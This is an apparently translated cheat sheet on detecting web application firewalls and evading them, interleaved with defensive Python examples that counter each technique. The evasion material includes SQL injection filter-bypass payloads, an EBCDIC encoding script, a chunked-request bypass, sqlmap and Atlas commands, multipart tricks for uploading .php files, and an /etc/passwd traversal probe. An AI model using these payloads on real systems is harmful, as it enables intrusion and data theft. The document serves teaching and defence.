WAF identification
Identifying a WAF
Some identify themselves through cookies (e.g. Citrix NetScaler, Yunsuo WAF, Safedog).
Some associate themselves with a specific header (e.g. Anquanbao WAF, Amazon AWS WAF).
Some frequently change headers and scramble characters to confuse the attacker (e.g. NetScaler, BIG-IP).
Some expose themselves in the Server header of the response (e.g. Approach, WTS WAF).
Some WAFs expose themselves in the response body (e.g. DotDefender, Armor, Sitelock).
Other WAFs answer malicious requests with unusual response codes (e.g. WebKnight, 360 WAF).
Some WAFs return a pile of junk data that hangs your client (e.g. Baidu Yunjiasu).
Detecting a WAF
Make a normal GET request from a browser, intercept it, and record the response headers (especially cookies).
Make a request from the command line (e.g. cURL) and compare the response content and headers (excluding User-Agent).
Make GET requests to random open ports and grab any banner that may reveal the WAF's identity.
If there is a login page, form page, etc., try some common (easily detected) payloads, such as " or 1=1 -- -
Append ../../../etc/passwd to a random parameter at the end of the URL.
Add some eye-catching keywords at the end of the URL, such as 'or sleep(5)'
Make a GET request using an outdated protocol (e.g. HTTP/0.9; HTTP/0.9 does not support POST queries).
Often a WAF changes the Server header depending on the type of interaction.
Drop-action technique: send a raw FIN/RST packet to the server and observe the response.
Side channel: check the timing behaviour of request and response content.
Common SQL injection filters and bypass methods
Common bypass methods
step1:
Filtered keywords: and, or, union. Likely regex: preg_match('/(and|or|union)/i', $id)
- Blocked: union select user, password from users
- Bypass: 1 || (select user from users where user_id = 1) = 'admin'
step2:
Filtered keywords: and, or, union, where
- Blocked: 1 || (select user from users where user_id = 1) = 'admin'
- Bypass: 1 || (select user from users limit 1) = 'admin'
step3:
Filtered keywords: and, or, union, where, limit
- Blocked: 1 || (select user from users limit 1) = 'admin'
- Bypass: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
step4:
Filtered keywords: and, or, union, where, limit, group by, select
- Blocked: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
- Bypass: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1
step5:
Filtered keywords: and, or, union, where, limit, group by, select
- Blocked: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
- Bypass: 1 || 1 = 1 into outfile 'result.txt'
- Bypass: 1 || substr(user,1,1) = 'a'
step6:
Filtered keywords: and, or, union, where, limit, group by, select, '
- Blocked: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
- Bypass: 1 || user_id is not null
- Bypass: 1 || substr(user,1,1) = 0x61
- Bypass: 1 || substr(user,1,1) = unhex(61)
step7:
Filtered keywords: and, or, union, where, limit, group by, select, ', hex
- Blocked: 1 || substr(user,1,1) = unhex(61)
- Bypass: 1 || substr(user,1,1) = lower(conv(11,10,36))
step8:
Filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr
- Blocked: 1 || substr(user,1,1) = lower(conv(11,10,36))
- Bypass: 1 || lpad(user,7,1)
step9:
Filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr, whitespace
- Blocked: 1 || lpad(user,7,1)
- Bypass: 1%0b||%0blpad(user,7,1)
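The step sequence above is the standard argument against keyword blacklists: each filter catches the previous payload and misses the next, and a substring match also rejects harmless words. The Python below is an editor's example added here, not code from the original notes. It reproduces the step 1-3 lists as `re.search` calls over the page's own payloads, then contrasts the concatenated query such a filter guards with a bound parameter. The `users` table and the sqlite3 backend are constructed for the demo; the page's payloads target MySQL, where `||` means OR, so the only payload executed here is the `or 1=1` form from the detection list above.

```python
import re
import sqlite3

# The keyword blacklists of steps 1-3 above, written the way the page's
# preg_match('/(and|or|union)/i', $id) check behaves: a case-insensitive
# substring search with no notion of SQL tokens.
STEP_FILTERS = {
    1: r"and|or|union",
    2: r"and|or|union|where",
    3: r"and|or|union|where|limit",
}

def is_blocked(step, user_input):
    """True if the step-N blacklist rejects the input (substring match, like preg_match)."""
    return re.search(STEP_FILTERS[step], user_input, re.IGNORECASE) is not None

def demo_db():
    """Constructed in-memory table with the columns the page's payloads reference."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "admin"), (2, "bob")])
    return conn

def unsafe_lookup(conn, user_input):
    """Vulnerable pattern: the (filtered) string is still concatenated into SQL."""
    return conn.execute("SELECT user FROM users WHERE user_id = " + user_input).fetchall()

def safe_lookup(conn, user_input):
    """Hardened pattern: a bound parameter is compared as a value and never
    parsed as SQL, so no keyword list is needed at all."""
    return conn.execute("SELECT user FROM users WHERE user_id = ?", (user_input,)).fetchall()

if __name__ == "__main__":
    # Each step's filter blocks the previous step's payload and passes its bypass.
    pairs = {
        1: ("union select user, password from users",
            "1 || (select user from users where user_id = 1) = 'admin'"),
        2: ("1 || (select user from users where user_id = 1) = 'admin'",
            "1 || (select user from users limit 1) = 'admin'"),
        3: ("1 || (select user from users limit 1) = 'admin'",
            "1 || (select user from users group by user_id having user_id = 1) = 'admin'"),
    }
    for step, (blocked, bypass) in pairs.items():
        print(step, is_blocked(step, blocked), is_blocked(step, bypass))
    print(is_blocked(1, "password"))        # the same filter rejects a harmless word
    conn = demo_db()
    print(unsafe_lookup(conn, "1 or 1=1"))  # concatenated: every row comes back
    print(safe_lookup(conn, "1 or 1=1"))    # bound: no row has that literal id
    print(safe_lookup(conn, "1"))
```

The bound-parameter version makes every step of the table irrelevant: the input can only ever be compared as a value, and the blacklist's false positives (any id containing "or" or "and") disappear with it.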
Burp plugin: bypasswaf
Parameters
① IP spoofing
② Content-Type: gets past a WAF that decodes/evaluates the body according to the declared type
③ Host: a misconfigured WAF may be set up to evaluate a request only when this header carries the correct FQDN of the host; that is what this bypass targets
④ pathinfo: random path-injection feature; constructs paths, similar to path fuzzing
⑤ PathObfuscation: path obfuscation
Original request: /get/?id=;netstat%20-ant
After obfuscation: /get///?id=;netstat%20-ant HTTP/1.1
⑥ HPP (HTTP parameter pollution)
Original attack: /get/?id=;netstat%20-ant
Parameter-pollution attack: /get/?id=;netstat%20-ant&id=test&id=test&id=test
⑦ SpaceEncoding (encoding the spaces)
Original attack: /get/?id=;netstat%20-ant
URL encoding
%u encoding
/get/?id=;netstat%u0000-ant
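Parameters ⑤ to ⑦ all rely on the inspection layer seeing a different request than the backend: extra slashes, repeated parameters, and escapes the WAF does not decode. The inspection-side counterpart is to canonicalise before matching. The following Python is an editor's example, not part of the original notes or the plugin; it takes the three request-targets listed above, collapses slash runs, keeps every value of a repeated parameter, decodes IIS-style `%uXXXX` escapes, and reports each anomaly so a rule can be applied to the canonical form.

```python
import re
import urllib.parse

_U_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})")

def decode_u_escapes(text):
    """Decode IIS-style %uXXXX escapes, which standard URL decoding leaves untouched."""
    return _U_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)

def canonicalize_request(request_target):
    """Return (path, params, warnings) for a request-target such as
    '/get///?id=;netstat%20-ant&id=test'.

    params maps each name to the list of *all* values sent for it, so parameter
    pollution stays visible instead of being collapsed to the first or last
    value, which is exactly where a WAF and a backend tend to disagree."""
    warnings = []
    path, _, query = request_target.partition("?")

    # Path obfuscation: a run of slashes is one separator to every common server.
    canonical_path = re.sub(r"/+", "/", path)
    if canonical_path != path:
        warnings.append(f"path rewritten: {path!r} -> {canonical_path!r}")

    params = {}
    for pair in (query.split("&") if query else []):
        raw_name, _, raw_value = pair.partition("=")
        name = urllib.parse.unquote_plus(raw_name)
        if _U_ESCAPE.search(raw_value):
            warnings.append(f"non-standard %u escape in parameter {name!r}")
        # Decode %u first, then ordinary percent-encoding, so nothing is decoded twice.
        value = urllib.parse.unquote_plus(decode_u_escapes(raw_value))
        if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
            warnings.append(f"control character in parameter {name!r}")
        if name in params:
            warnings.append(f"duplicate parameter {name!r} (parameter pollution)")
        params.setdefault(name, []).append(value)
    return canonical_path, params, warnings

if __name__ == "__main__":
    for target in ("/get///?id=;netstat%20-ant",
                   "/get/?id=;netstat%20-ant&id=test&id=test&id=test",
                   "/get/?id=;netstat%u0000-ant"):
        print(canonicalize_request(target))
```

Matching signatures against `params` rather than the raw query string means the obfuscated and original requests from the list above produce the same canonical form, and the warnings give a detection signal on their own even when no signature matches.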
Worked cases
Case 1: bypassing a WAF with character encoding
```http
POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41

input1='union all select * from users--
```
Character-encoding script
```python
# Python 3 port of the page's script (the original was written for Python 2's
# urllib.unquote/quote_plus and print statement); behaviour is unchanged.
import urllib.parse

def paramEncode(params="", charset="IBM037", encodeEqualSign=False, encodeAmpersand=False,
                urldecodeInput=True, urlencodeOutput=True):
    # Re-encode every name and value of a form body in `charset` (IBM037 is
    # EBCDIC), then percent-encode the resulting bytes.
    result = b""
    equalSign = b"="
    ampersand = b"&"
    if encodeEqualSign:
        equalSign = "=".encode(charset)
    if encodeAmpersand:
        ampersand = "&".encode(charset)
    for param_pair in params.split("&"):
        param, value = param_pair.split("=", 1)
        if urldecodeInput:
            # undo any percent-encoding already present in the input
            param = urllib.parse.unquote(param)
            value = urllib.parse.unquote(value)
        param = param.encode(charset)
        value = value.encode(charset)
        if urlencodeOutput:
            param = urllib.parse.quote_plus(param).encode("ascii")
            value = urllib.parse.quote_plus(value).encode("ascii")
        if result:
            result += ampersand
        result += param + equalSign + value
    return result.decode("latin-1")

# for IIS
print(paramEncode("input1='union all select * from users--"))
# prints %89%95%97%A4%A3%F1=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
```
With bypass
```http
POST /sample.aspx?%89%95%97%A4%A3%F0=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 115

%89%95%97%A4%A3%F1=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
```
| Target | POST (application/x-www-form-urlencoded): charsets the backend accepts. A backend that honours one of these uncommon encodings can be used to get past various WAFs. |
|---|---|
| Nginx, uWSGI-Django-Python3 | IBM037, IBM500, cp875, IBM1026, IBM273 |
| Nginx, uWSGI-Django-Python2 | IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424 |
| Apache-TOMCAT8-JVM1.8-JSP | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 |
| Apache-TOMCAT7-JVM1.6-JSP | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 |
| Apache-PHP5 (mod_php and FastCGI) | None |
| IIS8-PHP7.1-FastCGI | None |
| IIS6, 7.5, 8, 10 - Classic ASP | None |
| IIS6, 7.5, 8, 10 - ASPX (v4.x) | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025 |
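The table says which backends will decode a body in an EBCDIC code page; a WAF that matches signatures against the raw bytes sees nothing, while the application sees the original text. The inspection-side fix is to parse `charset` from Content-Type, decode the body the way the backend will, and treat any charset outside a short allowlist as a finding in itself. The Python below is an editor's example, not part of the original notes; the allowlist is constructed, and the two bodies are the plain and IBM037-encoded requests from the case above.

```python
import codecs
import urllib.parse

# Constructed allowlist: charsets a form endpoint normally expects. Anything
# else (the EBCDIC pages in the table, utf-16, utf-32) is worth flagging.
ALLOWED_CHARSETS = {"utf-8", "utf8", "us-ascii", "iso-8859-1"}

def parse_content_type(header_value):
    """Split 'application/x-www-form-urlencoded; charset=ibm037' into (media_type, charset)."""
    parts = [p.strip() for p in header_value.split(";")]
    charset = None
    for p in parts[1:]:
        key, _, val = p.partition("=")
        if key.strip().lower() == "charset":
            charset = val.strip().strip('"').lower()
    return parts[0].lower(), charset

def decode_form_body(body, charset):
    """Percent-decode each field to raw bytes, then decode those bytes with the
    declared charset, which is what the backends in the table do."""
    codecs.lookup(charset)  # LookupError for a charset this platform does not know
    fields = {}
    for pair in body.split("&"):
        raw_name, _, raw_value = pair.partition("=")
        name = urllib.parse.unquote_to_bytes(raw_name.replace("+", " ")).decode(charset)
        value = urllib.parse.unquote_to_bytes(raw_value.replace("+", " ")).decode(charset)
        fields[name] = value
    return fields

def naive_keyword_check(text):
    """The page's own keyword test applied to whatever text it is handed."""
    lower = text.lower()
    return "union" in lower and "select" in lower

def inspect_request(content_type, body):
    """Charset-aware inspection: decode as the backend will, then apply the keyword test."""
    _, charset = parse_content_type(content_type)
    charset = charset or "utf-8"
    verdict = []
    if charset not in ALLOWED_CHARSETS:
        verdict.append(f"unexpected charset {charset!r}")
    fields = decode_form_body(body, charset)
    for name, value in fields.items():
        if naive_keyword_check(value):
            verdict.append(f"SQL keywords in field {name!r}")
    return fields, verdict

# The two request bodies from the case above.
PLAIN_BODY = "input1='union all select * from users--"
EBCDIC_BODY = ("%89%95%97%A4%A3%F1=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83"
               "%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60")

if __name__ == "__main__":
    print(naive_keyword_check(EBCDIC_BODY))  # False: the raw bytes carry no ASCII keywords
    print(inspect_request("application/x-www-form-urlencoded; charset=ibm037", EBCDIC_BODY))
```

Applied to the raw IBM037 body, the keyword check returns nothing; applied after charset-aware decoding, it recovers the same `'union all select * from users--` the backend will execute, and the charset itself is reported as a second signal.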
Case 2: chunked transfer-encoding bypass
Chunked-encoding bypass
e.g.
Without bypass
```http
POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41

input1='union all select * from users--
```
With bypass
```http
POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 110
Transfer-Encoding: chunked

5;
input
4;
1='u
5;
nion 
4;
all 
5;
selec
4;
t * 
4;
from
5;
 user
3;
s--
0

```
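The chunked request above has two properties an inspection layer can act on: it carries both Content-Length and Transfer-Encoding, which RFC 7230 §3.3.3 says must not be trusted together, and its chunk-size lines end in a bare `;` with no extension name. The Python below is an editor's example, not part of the original notes: a strict dechunker that reassembles the page's chunks into the original body (with the trailing spaces the chunk sizes imply, e.g. `5;` followed by `nion `) and reports both oddities, so the keyword check from case 1 can run on the reassembled text.

```python
def check_framing_headers(headers):
    """Flag framing a WAF and a backend may interpret differently. When both
    Content-Length and Transfer-Encoding are present, RFC 7230 says
    Transfer-Encoding wins and the message may be rejected outright."""
    names = {k.lower() for k in headers}
    warnings = []
    if "content-length" in names and "transfer-encoding" in names:
        warnings.append("Content-Length and Transfer-Encoding both present")
    return warnings

def decode_chunked(raw):
    """Dechunk a body and return (bytes, warnings).

    Chunk-size lines are parsed as a lenient server would (hex size, optional
    ';' extension), but an empty extension such as '5;' is reported: RFC 7230
    requires a name after ';', and the request above uses that exact form."""
    body = bytearray()
    warnings = []
    pos = 0
    while True:
        end = raw.index(b"\r\n", pos)
        size_line = raw[pos:end].decode("ascii")
        size_text, sep, ext = size_line.partition(";")
        if sep and not ext.strip():
            warnings.append(f"empty chunk extension in {size_line!r}")
        size = int(size_text.strip(), 16)
        pos = end + 2
        if size == 0:
            break
        chunk = raw[pos:pos + size]
        if len(chunk) != size or raw[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk or missing CRLF after chunk data")
        body += chunk
        pos += size + 2
    return bytes(body), warnings

# The bypass request above, reconstructed with CRLF framing.
HEADERS = {
    "Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
    "Content-Length": "110",
    "Transfer-Encoding": "chunked",
}
CHUNKED_BODY = (
    b"5;\r\ninput\r\n"
    b"4;\r\n1='u\r\n"
    b"5;\r\nnion \r\n"
    b"4;\r\nall \r\n"
    b"5;\r\nselec\r\n"
    b"4;\r\nt * \r\n"
    b"4;\r\nfrom\r\n"
    b"5;\r\n user\r\n"
    b"3;\r\ns--\r\n"
    b"0\r\n\r\n"
)

if __name__ == "__main__":
    print(check_framing_headers(HEADERS))
    body, warnings = decode_chunked(CHUNKED_BODY)
    print(body, len(body), len(warnings))
```

Reassembled, the body is the same 39-byte `input1='union all select * from users--` as in the unchunked request, which is what any signature should be matched against; the Content-Length of 110 describes neither that body nor the wire bytes, which is the point of the framing check.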
Summary by WAF type
Common WAF bypasses
SQL injection bypasses
① Safedog bypass
SQL injection past Safedog
Inline (MySQL version comment) bypass
/*!80000aaa*/ is the same construct as the common /*!50001*/ form, with extra characters inside
e.g.
order/*!80000aaa*/by/*!80000aaa*/16
② Use a tool to fuzz for bypasses
Automated testing of SQL injection WAF bypasses
https://github.com/m4ll0k/Atlas
GET injection
python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
POST injection
python atlas.py --url http://site.com/index/id/ -m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
Header injection
python atlas.py --url http://site.com/index/id/ -H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
Combining tampers
python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v
Listing tampers
python atlas.py -g
Example
Injection
python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3
File upload bypasses
Uploading content past Safedog
Bypassing the content check
Use an AV-evading webshell, or pad the content massively to get past it.
③ Bypassing traffic inspection
AntSword bypass
Or directly upload a full-featured webshell.
Extension bypass
Common blacklist
asp|asa|cer|cdx|aspx|ashx|ascx|asax
php|php2|php3|php4|php5|asis|htaccess
htm|html|shtml|pwml|phtml|phtm|js|jsp
vbs|asis|sh|reg|cgi|exe|dll|com|bat|pl|cfc|cfm|ini
Bypass principle
So the approach is to modify Content-Disposition: form-data; name="file_x"; filename="xx.php" and Content-Type by freely adding and removing content.
Bypasses seen previously
# General bypass techniques
1. Changing the quotes
1.1 Removing the quotes
# remove the quotes around name
Content-Disposition: form-data; name=file_x; filename="xx.php"
# remove the quotes around filename
Content-Disposition: form-data; name="file_x"; filename=xx.php
# remove both
Content-Disposition: form-data; name=file_x; filename=xx.php
1.2 Changing double quotes to single quotes
2. Case changes: vary the case of these three fields; this used to get past Safedog
Content-Disposition
name
filename
3. Add one or more spaces around : ; = to get past the check.
4. Remove or modify the Content-Disposition value, dropping form-data.
5. Swap the positions of filename and name.
6. Duplication
6.1 e.g. duplicate filename
Content-Disposition: form-data; name="file_x"; filename="test.txt"; filename="test.php"
6.2 Duplicate the whole part
```http
------WebKitFormBoundaryj1oRYFW91eaj8Ex2
Content-Disposition: form-data; name="file_x"; filename="test.txt"
Content-Type: text/javascript

------WebKitFormBoundaryj1oRYFW91eaj8Ex2
Content-Disposition: form-data; name="file_x"; filename="test.php"
Content-Type: text/javascript

------WebKitFormBoundaryj1oRYFW91eaj8Ex2
Content-Disposition: form-data; name="submit_x"

upload
------WebKitFormBoundaryj1oRYFW91eaj8Ex2--
```
6.3 Duplicate the semicolon: the file name fails to parse, which gets past the check
# Language-specific bypass techniques
PHP
① Adding characters
1.1 Adding to the boundary in the header
Add arbitrary characters in front of boundary in the Content-Type header (reason: some PHP builds still parse this)
Content-Type: multipart/form-data; bypassboundary=----WebKitFormBoundaryj1oRYFW91eaj8Ex2
1.2 Adding in front of filename and name
nb;filename="test.php";
② Splitting filename: split filename into file name (this used to get past a certain WAF)
Content-Disposition: form-data; name="file_x"; file name="test.php"
Previous WAF bypass cases
Case
Bypassing the extension check
Content-Disposition is not handled well: once its length reaches 48930, Safedog's upload defense stops working.
e.g.
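Every multipart trick in this section (quotes removed or swapped, case changed, spaces inserted, `form-data` dropped, doubled `;`, doubled `filename`, `file name` split, and finally a header so long the WAF gives up) works because a lenient parser guesses at a malformed header and the guess differs between WAF and backend. The Python below is an editor's example, not code from the original notes or from any of the products named: a strict Content-Disposition parser that refuses every one of those forms instead of guessing, bounds the header length, and checks the file name against an extension allowlist rather than the blacklist shown above. The allowlist and the 8192-byte bound are constructed values.

```python
import re

# Constructed allowlist; the page's list is a blacklist, which is exactly
# what the header mutations above are designed to slip past.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
# Constructed bound. The case above reports Safedog giving up at 48930
# characters; a parser should refuse long before that rather than stop checking.
MAX_HEADER_LENGTH = 8192

_PREFIX = "Content-Disposition: form-data"
# One parameter: ';', optional spaces, a token, '=', a double-quoted value.
_PARAM = re.compile(r';\s*([A-Za-z0-9_-]+)="([^"]*)"')

def parse_content_disposition(header):
    """Strictly parse one multipart part's Content-Disposition line.

    Returns (params, errors). Unquoted or single-quoted values, spaces around
    ':' or '=', case changes, a missing form-data token, a doubled ';', and
    duplicated or split parameter names all produce an error instead of a
    guess, so no two parsers can read the header differently."""
    if len(header) > MAX_HEADER_LENGTH:
        return {}, ["header too long"]
    if not header.startswith(_PREFIX):
        return {}, ["not a form-data Content-Disposition header"]
    params, errors = {}, []
    pos = len(_PREFIX)
    while pos < len(header):
        m = _PARAM.match(header, pos)
        if not m:
            errors.append(f"malformed parameter at offset {pos}: {header[pos:pos + 20]!r}")
            break
        key, value = m.group(1), m.group(2)
        if key in params:
            errors.append(f"duplicate parameter {key!r}")
        params[key] = value
        pos = m.end()
    if "name" not in params:
        errors.append("missing name parameter")
    return params, errors

def validate_upload(header):
    """Decide whether a file part may be stored. Returns (ok, errors)."""
    params, errors = parse_content_disposition(header)
    if errors:
        return False, errors
    filename = params.get("filename")
    if filename is None:
        return False, ["no filename parameter"]
    # Keep only the last path component, whichever separator the client used.
    basename = filename.replace("\\", "/").rsplit("/", 1)[-1]
    parts = basename.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, [f"no usable extension in {basename!r}"]
    # Every extension must be allowed, so a double extension is rejected too.
    for ext in parts[1:]:
        if ext.lower() not in ALLOWED_EXTENSIONS:
            return False, [f"extension {ext!r} not in allowlist"]
    return True, []

if __name__ == "__main__":
    for h in ('Content-Disposition: form-data; name="file_x"; filename="report.pdf"',
              'Content-Disposition: form-data; name="file_x"; filename="xx.php"',
              'Content-Disposition: form-data; name="file_x"; filename="test.txt"; filename="test.php"',
              'Content-Disposition: form-data; name="file_x"; file name="test.php"',
              'Content-Disposition: form-data; name=file_x; filename="xx.php"',
              'content-disposition: form-data; name="file_x"; filename="xx.php"'):
        print(validate_upload(h))
```

Because the parser rejects rather than repairs, the 6.1 double-filename header, the split `file name` header, and every quote or case variant from the list above come back as errors, and the only question left for an accepted part is whether its extension is on the allowlist.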